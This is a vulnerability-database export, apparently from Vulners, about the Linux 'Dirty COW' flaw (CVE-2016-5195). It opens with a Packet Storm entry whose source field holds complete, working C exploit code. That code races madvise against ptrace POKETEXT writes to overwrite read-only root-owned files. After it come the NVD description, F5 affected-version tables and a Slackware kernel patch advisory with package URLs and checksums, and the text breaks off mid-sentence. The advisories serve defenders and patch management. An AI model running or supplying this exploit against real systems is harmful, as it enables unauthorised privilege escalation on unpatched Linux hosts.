{"type": "packetstorm", "published": "2016-11-25T00:00:00", "reporter": "Phil Oester", "objectVersion": "1.2", "bulletinFamily": "exploit", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.2}, "sourceData": "`// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball \n#include <fcntl.h> //// pikachu \n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball \n#include <string.h> //// pokeball \n#include <stdio.h> //// (___) \n#include <stdint.h> //// (o o)_____/ \n#include <sys/mman.h> //// @@ ` \\ \n#include <sys/types.h> //// \\ ____, /miltank \n#include <sys/stat.h> //// // // \n#include <sys/wait.h> //// ^^ ^^ \n#include <sys/ptrace.h> //// mmap bc757000 \n#include <unistd.h> //// madvise 0 \n////////////////////////////////////////////// ptrace 0 \n////////////////////////////////////////////// miltank \n////////////////////////////////////////////// \nint f ;// file descriptor \nvoid *map ;// memory map \npid_t pid ;// process id \npthread_t pth ;// thread \nstruct stat st ;// file info \n////////////////////////////////////////////// \nvoid *madviseThread(void *arg) {// madvise thread \nint i,c=0 ;// counters \nfor(i=0;i<200000000;i++)//////////////////// loop to 2*10**8 \nc+=madvise(map,100,MADV_DONTNEED) ;// race condition \nprintf(\"madvise %d\\n\\n\",c) ;// sum of errors \n}// /madvise thread \n////////////////////////////////////////////// \nint main(int argc,char *argv[]) {// entrypoint \nif(argc<3)return 1 ;// ./d file contents \nprintf(\"%s \\n\\ \n(___) \\n\\ \n(o o)_____/ \\n\\ \n@@ ` \\\\ \\n\\ \n\\\\ ____, /%s \\n\\ \n// // \\n\\ \n^^ ^^ \\n\\ \n\", argv[1], argv[2]) ;// dirty cow \nf=open(argv[1],O_RDONLY) ;// open read only file \nfstat(f,&st) ;// stat the fd \nmap=mmap(NULL ,// mmap the file \nst.st_size+sizeof(long) ,// size is filesize plus padding \nPROT_READ ,// read-only \nMAP_PRIVATE ,// private mapping for cow \nf ,// file descriptor \n0) ;// zero \nprintf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code \npid=fork() ;// fork process \nif(pid) {// if parent \nwaitpid(pid,NULL,0) ;// wait for child \nint u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length) \nfor(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l \nfor(o=0;o<l;o++)//////////////////////// repeat for each byte \nfor(u=0;u<10000;u++)////////////////// try 10K times each time \nc+=ptrace(PTRACE_POKETEXT ,// inject into memory \npid ,// process id \nmap+o ,// address \n*((long*)(argv[2]+o))) ;// value \nprintf(\"ptrace %d\\n\\n\",c) ;// sum of error code \n}// otherwise \nelse {// child \npthread_create(&pth ,// create new thread \nNULL ,// null \nmadviseThread ,// run madviseThred \nNULL) ;// null \nptrace(PTRACE_TRACEME) ;// stat ptrace on child \nkill(getpid(),SIGSTOP) ;// signal parent \npthread_join(pth,NULL) ;// wait for thread \n}// / child \nreturn 0 ;// return \n}// / entrypoint \n////////////////////////////////////////////// \n \n \n`\n", "viewCount": 14, "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "b8ac349c0c775b5a7502fd015af39f1b"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "29656d499523d56fe92f1ca967cd3736"}, {"key": "modified", "hash": "06727c0774a7be992bf63aa9745be055"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "06727c0774a7be992bf63aa9745be055"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9527b253b7c9dc7e85640e31c9342dd1"}, {"key": "sourceData", "hash": "83359d536e338928aedc6b198431fe99"}, {"key": "sourceHref", "hash": "35e38b735d63de2cab7060309439c662"}, {"key": "title", "hash": "434799bfd4a23c1104a9ba891993a497"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "href": "https://packetstormsecurity.com/files/139922/Linux-Kernel-Dirty-COW-PTRACE_POKEDATA-Privilege-Escalation.html", "sourceHref": "https://packetstormsecurity.com/files/download/139922/dirtycowptrace-escalate.txt", "title": "Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation", "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2016-12-05T22:20:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-5195"]}, {"type": "f5", "idList": ["F5:K10558632", "SOL10558632"]}, {"type": "thn", "idList": ["THN:6681D64EFC53E13356AF1184CE1D6024", "THN:B571C1AAA8CDDC10150ABA0BF22B19E6"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2105", "ELSA-2016-2098"]}, {"type": "exploitdb", "idList": ["EDB-ID:40838", "EDB-ID:40847", "EDB-ID:40839"]}, {"type": "myhack58", "idList": ["MYHACK58:62201680403"]}, {"type": "ubuntu", "idList": ["USN-3107-2", "USN-3106-4", "USN-3106-1", "USN-3104-1", "USN-3104-2", "USN-3105-2", "USN-3106-3", "USN-3105-1"]}, {"type": "canvas", "idList": ["LINUX_FOLL_WRITE_COW"]}, {"type": "redhat", "idList": ["RHSA-2016:2118", "RHSA-2016:2127", "RHSA-2016:2120", "RHSA-2016:2132", "RHSA-2016:2105"]}, {"type": "suse", "idList": ["SUSE-SU-2016:2614-1", "SUSE-SU-2016:2592-1", "SUSE-SU-2016:2596-1", "SUSE-SU-2016:2585-1", "SUSE-SU-2016:2593-1"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2016-2127.NASL", "SL_20161025_IMPORTANT__KERNEL_ON_SL6_X.NASL", "UBUNTU_USN-3107-1.NASL", "REDHAT-RHSA-2016-2105.NASL", "REDHAT-RHSA-2016-2106.NASL", "REDHAT-RHSA-2016-2120.NASL", "SUSE_SU-2016-2614-1.NASL", "SL_20161024_KERNEL_ON_SL7_X.NASL", "REDHAT-RHSA-2016-2118.NASL", "UBUNTU_USN-3106-4.NASL"]}, {"type": "archlinux", "idList": ["ASA-201610-14", "ASA-201610-11", "ASA-201610-16"]}, {"type": "zdt", "idList": ["1337DAY-ID-26446", "1337DAY-ID-25952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842923", "OPENVAS:1361412562310871676", "OPENVAS:1361412562310842925", "OPENVAS:1361412562310842919", "OPENVAS:1361412562310842974", "OPENVAS:1361412562310809956", "OPENVAS:1361412562310842922", "OPENVAS:1361412562310842920", "OPENVAS:1361412562310842924", "OPENVAS:1361412562310871675"]}, {"type": "threatpost", "idList": ["THREATPOST:E5B29B24D99DF66802D64661812BCFB9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139923"]}, {"type": "paloalto", "idList": ["PAN-SA-2017-0003"]}, {"type": "saint", "idList": ["SAINT:ACA0D81E9F0D7499A5952D634DA1559F", "SAINT:D99FE3AF85FA3F5D4D5C3CB8B43F5183", "SAINT:1E3BA1480EBC78481EFFC9BD1CFFBBE2"]}, {"type": "amazon", "idList": ["ALAS-2016-757"]}, {"type": "seebug", "idList": ["SSV:92488", "SSV:96908"]}, {"type": "centos", "idList": ["CESA-2016:2105", "CESA-2016:2098"]}, {"type": "vmware", "idList": ["VMSA-2016-0018"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20161207-01-DIRTYCOW"]}, {"type": "cert", "idList": ["VU:243144"]}, {"type": "slackware", "idList": ["SSA-2016-305-01"]}, {"type": "cisco", "idList": ["CISCO-SA-20161026-LINUX"]}, {"type": "securelist", "idList": ["SECURELIST:B700542D10BA5EEA36C5D69A24B3C6EE"]}], "modified": "2016-12-05T22:20:07", "rev": 2}, "vulnersScore": 6.1}, "references": [], "id": "PACKETSTORM:139922", "hash": "d5e3306a3fcbdbcdac11571a2fe7a3bade0de4bed24e5137206a9dca2b3e1b29", "lastseen": "2016-12-05T22:20:07", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-25T00:00:00", "description": ""}

{"cve": [{"lastseen": "2020-05-08T11:22:55", "bulletinFamily": "NVD", "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "modified": "2020-02-17T16:15:00", "id": "CVE-2016-5195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5195", "published": "2016-11-10T21:59:00", "title": "CVE-2016-5195", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2020-04-06T22:40:20", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned IDs 624457 and 624459 (BIG-IP), ID 625230 (BIG-IQ), ID 625231 (Enterprise Manager), INSTALLER-2794 (Traffix SDC), and ID 625362 (F5 iWorkflow) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H624248 on the **Diagnostics** &gt; **Identified** &gt; **High** page. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 \n12.1.2 HF1 | High | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | High | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PSM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | High | Linux kernel \nBIG-IP WOM | 11.2.1 | None | High | Linux kernel \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b11.6.2 \n11.6.1 HF2 | High | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | 3.1.1 HF8 | High | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Device | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | High | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | High | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.1 | 2.0.2 - 2.3.0 | High | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | High | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel \n \nF5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article, and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K13123>)\n", "modified": "2019-09-26T18:41:00", "published": "2016-10-21T18:38:00", "id": "F5:K10558632", "href": "https://support.f5.com/csp/article/K10558632", "title": "Linux privilege-escalation vulnerability CVE-2016-5195 ", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-21T17:25:15", "bulletinFamily": "software", "description": "Supplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10558632.html", "id": "SOL10558632", "type": "f5", "title": "SOL10558632 - Linux privilege-escalation vulnerability (Dirty COW) CVE-2016-5195", "cvss": {"score": 0.0, "vector": "NONE"}}], "slackware": [{"lastseen": "2019-05-30T07:37:24", "bulletinFamily": "unix", "description": "New kernel packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/linux-4.4.29/*: Upgraded.\n This kernel fixes a security issue known as &quot;Dirty COW&quot;. A race condition\n was found in the way the Linux kernel's memory subsystem handled the\n copy-on-write (COW) breakage of private read-only memory mappings. An\n unprivileged local user could use this flaw to gain write access to\n otherwise read-only memory mappings and thus increase their privileges on\n the system.\n Be sure to upgrade your initrd after upgrading the kernel packages.\n If you use lilo to boot your machine, be sure lilo.conf points to the correct\n kernel and initrd and run lilo as root to update the bootloader.\n If you use elilo to boot your machine, you should run eliloconfig to copy the\n kernel and initrd to the EFI System Partition.\n For more information, see:\n https://dirtycow.ninja/\n https://www.kb.cert.org/vuls/id/243144\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/linux-3.2.83/kernel-generic-3.2.83-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/linux-3.2.83/kernel-generic-smp-3.2.83_smp-i686-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/linux-3.2.83/kernel-headers-3.2.83_smp-x86-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/linux-3.2.83/kernel-huge-3.2.83-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/linux-3.2.83/kernel-huge-smp-3.2.83_smp-i686-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/linux-3.2.83/kernel-modules-3.2.83-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/linux-3.2.83/kernel-modules-smp-3.2.83_smp-i686-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/linux-3.2.83/kernel-source-3.2.83_smp-noarch-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/linux-3.2.83/kernel-generic-3.2.83-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/linux-3.2.83/kernel-headers-3.2.83-x86-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/linux-3.2.83/kernel-huge-3.2.83-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/linux-3.2.83/kernel-modules-3.2.83-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/linux-3.2.83/kernel-source-3.2.83-noarch-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.104/kernel-generic-3.10.104-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.104/kernel-generic-smp-3.10.104_smp-i686-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.104/kernel-headers-3.10.104_smp-x86-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.104/kernel-huge-3.10.104-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.104/kernel-huge-smp-3.10.104_smp-i686-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.104/kernel-modules-3.10.104-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.104/kernel-modules-smp-3.10.104_smp-i686-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.104/kernel-source-3.10.104_smp-noarch-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.104/kernel-generic-3.10.104-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.104/kernel-headers-3.10.104-x86-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.104/kernel-huge-3.10.104-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.104/kernel-modules-3.10.104-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.104/kernel-source-3.10.104-noarch-1_slack14.1.txz\n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.29/kernel-generic-4.4.29-i586-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.29/kernel-generic-smp-4.4.29_smp-i686-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.29/kernel-headers-4.4.29_smp-x86-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.29/kernel-huge-4.4.29-i586-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.29/kernel-huge-smp-4.4.29_smp-i686-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.29/kernel-modules-4.4.29-i586-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.29/kernel-modules-smp-4.4.29_smp-i686-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.29/kernel-source-4.4.29_smp-noarch-1_slack14.2.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.29/kernel-generic-4.4.29-x86_64-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.29/kernel-headers-4.4.29-x86-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.29/kernel-huge-4.4.29-x86_64-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.29/kernel-modules-4.4.29-x86_64-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.29/kernel-source-4.4.29-noarch-1_slack14.2.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-generic-4.4.29-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-generic-smp-4.4.29_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-huge-4.4.29-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-huge-smp-4.4.29_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-modules-4.4.29-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-modules-smp-4.4.29_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/kernel-headers-4.4.29_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/k/kernel-source-4.4.29_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-generic-4.4.29-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-huge-4.4.29-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-modules-4.4.29-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/kernel-headers-4.4.29-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/k/kernel-source-4.4.29-noarch-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 packages:\n9d31423cbc2d691075051611e47fccc3 kernel-generic-3.2.83-i486-1_slack14.0.txz\n1de6a61bb7bc0ba6fcb2d0312b2007fa kernel-generic-smp-3.2.83_smp-i686-1_slack14.0.txz\nf37732224a455b481a51458b0f6f4cf0 kernel-headers-3.2.83_smp-x86-1_slack14.0.txz\n7ddf907def979359b7cb2bb5df5d79ae kernel-huge-3.2.83-i486-1_slack14.0.txz\n7abe4b1b16ae0658cfe81876922ed1a6 kernel-huge-smp-3.2.83_smp-i686-1_slack14.0.txz\n804321f7746c6a1da3b48e7ccd7f039b kernel-modules-3.2.83-i486-1_slack14.0.txz\n514182d51ec9536f3798a9edddbdced3 kernel-modules-smp-3.2.83_smp-i686-1_slack14.0.txz\n408771f2aca86e8e12b496908fe320b5 kernel-source-3.2.83_smp-noarch-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\nf6a1a838ef49e6c3f11fd792abffdfe3 kernel-generic-3.2.83-x86_64-1_slack14.0.txz\n61a41ce9892921069a0897ca541c38ed kernel-headers-3.2.83-x86-1_slack14.0.txz\n82f97a98ad47d9fcd8dd6c138b090987 kernel-huge-3.2.83-x86_64-1_slack14.0.txz\nb858d0d99b37e7d4dab9544db7c8ead5 kernel-modules-3.2.83-x86_64-1_slack14.0.txz\n74d286781fa31a0b7fe7b7ea511563ba kernel-source-3.2.83-noarch-1_slack14.0.txz\n\nSlackware 14.1 packages:\n4158db7170350ae80636c2884cb0b276 kernel-generic-3.10.104-i486-1_slack14.1.txz\nd2e09aa65882d4fbfd4cc8971f72b8d6 kernel-generic-smp-3.10.104_smp-i686-1_slack14.1.txz\n82dd1b7902b7d9f74b0764ddae787e6b kernel-headers-3.10.104_smp-x86-1_slack14.1.txz\n4c8a8115f2754e1e208808089ed2c78f kernel-huge-3.10.104-i486-1_slack14.1.txz\n611a97c6b2afe90c92b1285d052728f6 kernel-huge-smp-3.10.104_smp-i686-1_slack14.1.txz\n62e5ea99a84d4ff6fc6a60cac9bc2bbf kernel-modules-3.10.104-i486-1_slack14.1.txz\nfe18186221e19f59f4698a889e45da70 kernel-modules-smp-3.10.104_smp-i686-1_slack14.1.txz\nf51b72e3054f83c9674962e1d6cbcdfb kernel-source-3.10.104_smp-noarch-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n043c64488e53a591a5cb6bb5a90682d4 kernel-generic-3.10.104-x86_64-1_slack14.1.txz\nac84470b3834fc9d6928af2e8d949724 kernel-headers-3.10.104-x86-1_slack14.1.txz\n176099b83a08cb193c857c7ea1ad8336 kernel-huge-3.10.104-x86_64-1_slack14.1.txz\n240d7402c57b547dec0a448d326d4fc1 kernel-modules-3.10.104-x86_64-1_slack14.1.txz\n27a7e86830a98f12e17fbe13f30263f7 kernel-source-3.10.104-noarch-1_slack14.1.txz\n\nSlackware 14.2 packages:\n3c7c7144d53483c93e9fb148ce9df108 kernel-generic-4.4.29-i586-1_slack14.2.txz\n0948e7329b7cd8ad051551177e1b9495 kernel-generic-smp-4.4.29_smp-i686-1_slack14.2.txz\nb853af24a50f12a1e35cbf58f3da9195 kernel-headers-4.4.29_smp-x86-1_slack14.2.txz\nb93c5316864b04df29d1e3dffc02179c kernel-huge-4.4.29-i586-1_slack14.2.txz\nebbe654ebfb20c2b17b535a4eee568db kernel-huge-smp-4.4.29_smp-i686-1_slack14.2.txz\n77705e2112a9aad7e5b1eda5ae40a544 kernel-modules-4.4.29-i586-1_slack14.2.txz\nf131c03dc4971b14f33267b6bc469018 kernel-modules-smp-4.4.29_smp-i686-1_slack14.2.txz\n4020837286ff3678eafdfe8ca1b286dc kernel-source-4.4.29_smp-noarch-1_slack14.2.txz\n\nSlackware x86_64 14.2 packages:\n7a3059455d20095c4914efc140eb93d3 kernel-generic-4.4.29-x86_64-1_slack14.2.txz\nddae426aa1cb94ef4a20706d9562b349 kernel-headers-4.4.29-x86-1_slack14.2.txz\na626808871b4543b932161e6024af471 kernel-huge-4.4.29-x86_64-1_slack14.2.txz\n970ba7d37ad375a5e10ab35e4bf1c3c3 kernel-modules-4.4.29-x86_64-1_slack14.2.txz\n245ff7965885ca956d2e5639c5f0f3a0 kernel-source-4.4.29-noarch-1_slack14.2.txz\n\nSlackware -current packages:\n14641c14bcaa9a4abff88b79958df0e6 a/kernel-generic-4.4.29-i586-1.txz\n808060a20d6656a5696cfd5cba53ed80 a/kernel-generic-smp-4.4.29_smp-i686-1.txz\n322d42e0d09fcda5d1c7c666b82aa42c a/kernel-huge-4.4.29-i586-1.txz\nc4e4a12fe578c8d271706da7991cc951 a/kernel-huge-smp-4.4.29_smp-i686-1.txz\ne387e16d5d591c8e356ccf54f25d8573 a/kernel-modules-4.4.29-i586-1.txz\nc59f22b80fa306c4307290650699b5c0 a/kernel-modules-smp-4.4.29_smp-i686-1.txz\n07f33b489f234c273744516bc1fd8900 d/kernel-headers-4.4.29_smp-x86-1.txz\nff91eed31a58bdac17b7bef3ded737a8 k/kernel-source-4.4.29_smp-noarch-1.txz\n\nSlackware x86_64 -current packages:\n3d355774da7a4a36f41041ab38ad2635 a/kernel-generic-4.4.29-x86_64-1.txz\n552b9aaf58822a31991a4a84f37a7be2 a/kernel-huge-4.4.29-x86_64-1.txz\n81b5b86c5b9793515ce473083514b637 a/kernel-modules-4.4.29-x86_64-1.txz\n21c55dfb2e0986548cc654e69a2b5dc8 d/kernel-headers-4.4.29-x86-1.txz\n5be03e0b8a0b65aec6db2c4a4f81360a k/kernel-source-4.4.29-noarch-1.txz\n\n\nInstallation 